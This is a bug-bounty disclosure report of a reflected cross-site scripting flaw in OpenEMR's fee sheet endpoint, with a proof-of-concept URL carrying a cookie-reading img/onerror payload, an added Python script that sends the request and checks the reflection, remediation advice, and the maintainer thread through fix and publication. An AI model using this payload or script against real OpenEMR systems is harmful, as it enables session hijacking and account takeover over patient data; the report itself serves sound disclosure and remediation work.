Cross Site Scripting (reflected) on fee_sheet_ajax.php in openemr/openemr

Valid

Reported on Aug 18th 2022


Description

While testing the application for XSS we found that the fee_sheet_ajax.php endpoint (interface/forms/fee_sheet/review/) reflects the prev_encounter GET parameter into its response without HTML-encoding it, which gives a reflected cross-site scripting vulnerability.

PoC

  1. Visit https://<openemr-instance>/interface/forms/fee_sheet/review/fee_sheet_ajax.php?task=retrieve&mode=encounters&prev_encounter=%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E
  2. The prev_encounter value decodes to <img src=a onerror=alert(document.cookie)>. Because it is echoed back unencoded, the browser parses it as markup, the image load fails and the onerror handler runs (the alert fires).

OWASP Category

A03:2021-Injection

Remediation

Wrap the value echoed at https://github.com/openemr/openemr/blob/master/interface/forms/fee_sheet/review/fee_sheet_ajax.php#L65 in OpenEMR's text() helper (its htmlspecialchars() wrapper) so the parameter is HTML-encoded before it is written into the response. If the value lands inside an HTML attribute rather than element text, attr() is the right helper instead.
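The following is an added example, not OpenEMR code and not part of the original report. It reproduces the check behind the PoC above (build the request, classify how the response reflects the payload) and models what the text() remediation changes. The endpoint path and payload come from the report; the response bodies are constructed placeholders, and the assumption that text() behaves like htmlspecialchars() with ENT_NOQUOTES is mine.

```python
"""Added example: verify the fee_sheet_ajax.php reflection and model the
text() fix. Not OpenEMR code; response bodies below are constructed."""
import html
import urllib.parse
import urllib.request

# Decoded form of the payload used in the PoC URL above.
PAYLOAD = "<img src=a onerror=alert(document.cookie)>"
# Endpoint path taken from the report.
ENDPOINT = "/interface/forms/fee_sheet/review/fee_sheet_ajax.php"


def build_poc_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Build the same request as the PoC, URL-encoding the payload
    with the standard library instead of by hand."""
    query = urllib.parse.urlencode(
        {"task": "retrieve", "mode": "encounters", "prev_encounter": payload},
        quote_via=urllib.parse.quote,  # spaces as %20, like the PoC URL
    )
    return base_url.rstrip("/") + ENDPOINT + "?" + query


def escape_like_text(value: str) -> str:
    """Assumption: OpenEMR's text() helper is htmlspecialchars() with
    ENT_NOQUOTES, i.e. it encodes &, < and > and leaves quotes alone.
    html.escape(quote=False) does the same, so this models the fix."""
    return html.escape(value, quote=False)


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Classify how a response reflects the payload.
    'unescaped' -> raw markup is present (vulnerable)
    'escaped'   -> only the entity-encoded form is present (fixed)
    'absent'    -> the parameter is not reflected at all"""
    if payload in body:
        return "unescaped"
    if escape_like_text(payload) in body:
        return "escaped"
    return "absent"


def check_live(base_url: str, cookie: str = "", timeout: int = 10) -> str:
    """Send the PoC request to a running instance and classify the reply.
    Only use against an instance you are authorised to test."""
    req = urllib.request.Request(build_poc_url(base_url))
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify_reflection(resp.read().decode("utf-8", "replace"))


# Constructed sample responses (not captured from a real instance):
# before the fix the parameter is echoed verbatim into the HTML,
# after the fix it passes through text() first.
VULNERABLE_BODY = "<div id='encounters'>" + PAYLOAD + "</div>"
PATCHED_BODY = "<div id='encounters'>" + escape_like_text(PAYLOAD) + "</div>"

if __name__ == "__main__":
    print(build_poc_url("https://openemr.example"))
    print("before fix:", classify_reflection(VULNERABLE_BODY))
    print("after fix: ", classify_reflection(PATCHED_BODY))
```

The classifier only distinguishes raw from entity-encoded reflection in an HTML text context, which is exactly what text() addresses; a reflection into an attribute value or a script block would need attr() or a JSON-encoding step respectively, and a different check.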

Impact

The impact of an exploited XSS vulnerability depends on what the injected script can reach. The script runs in the browser of whichever OpenEMR user opens the crafted link, so it can read data that user can see, send requests in that user's name (including state-changing ones, since a page-embedded CSRF token is readable from script), and attempt session hijacking where the session cookie is exposed to script. In that way an attacker can impersonate the victim and take over the account; if the victim has administrative rights, follow-on actions up to code execution on the server are possible, depending on the application's administrative features and the privileges of the account.

We are processing your report and will contact the openemr team within 24 hours. (9 months ago)
Kusuman modified the report. (9 months ago)
Kusuman modified the report. (9 months ago)
We have contacted a member of the openemr team and are waiting to hear back. (9 months ago)
stephen waite validated this vulnerability. (9 months ago)

Thanks for the report. A preliminary fix has been posted in this PR: https://github.com/openemr/openemr/pull/5695

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 1-3 weeks. After we do that, it will be OK to create a CVE # and make it public.

Thanks!

Kusuman has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kusuman (Researcher), 9 months ago:

Okay, thank you.

We have sent a fix follow up to the openemr team. We will try again in 7 days. (9 months ago)
We have sent a second fix follow up to the openemr team. We will try again in 10 days. (8 months ago)
We have sent a third and final fix follow up to the openemr team. This report is now considered stale. (8 months ago)
Brady Miller (Maintainer), 7 months ago:

Updating that the fix is in a PR for the rel-700 branch, which will be in the next 7.0.0 patch 2 (7.0.0.2): https://github.com/openemr/openemr/pull/5808 (after we bring this PR in, we will then mark this item as fixed).

Brady Miller marked this as fixed in 7.0.0.2 with commit d5eb41. (6 months ago)
The fix bounty has been dropped.
This vulnerability will not receive a CVE.
fee_sheet_ajax.php#L65 has been validated.
Brady Miller (Maintainer), 6 months ago:

Plan to "Publish" this about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 2-4 weeks.

Brady Miller (Maintainer), 6 months ago:

@admin, I made an error in the version that this will be fixed in. It should be 7.0.0.2 and not 7.0.2.

Ben Harvie (Admin), 6 months ago:

I have updated the fixed version to 7.0.0.2 as requested :)

Kusuman (Researcher), 6 months ago:

Confirmed, it's no longer vulnerable. @admin, can we assign a CVE to this vulnerability?

Brady Miller (Maintainer), 6 months ago:

Hi @kusuman, we will likely be releasing the 7.0.0.2 patch this weekend. After we release the 7.0.0.2 patch, we will "Publish" this vulnerability, which per my understanding will also assign it a CVE.

Kusuman (Researcher), 6 months ago:

Got it, thanks.

Brady Miller published this vulnerability. (5 months ago)

Kusuman (Researcher), 5 months ago:

@admin, can we assign a CVE to this vulnerability?

Brady Miller (Maintainer), 5 months ago:

@admin, when I published this, I did ensure the CVE toggle was on, but nothing populated/changed in the GUI when I did that.

Pavlos (Admin), 5 months ago:

Sorry about that, we changed our UX. We'll make sure it gets a CVE.
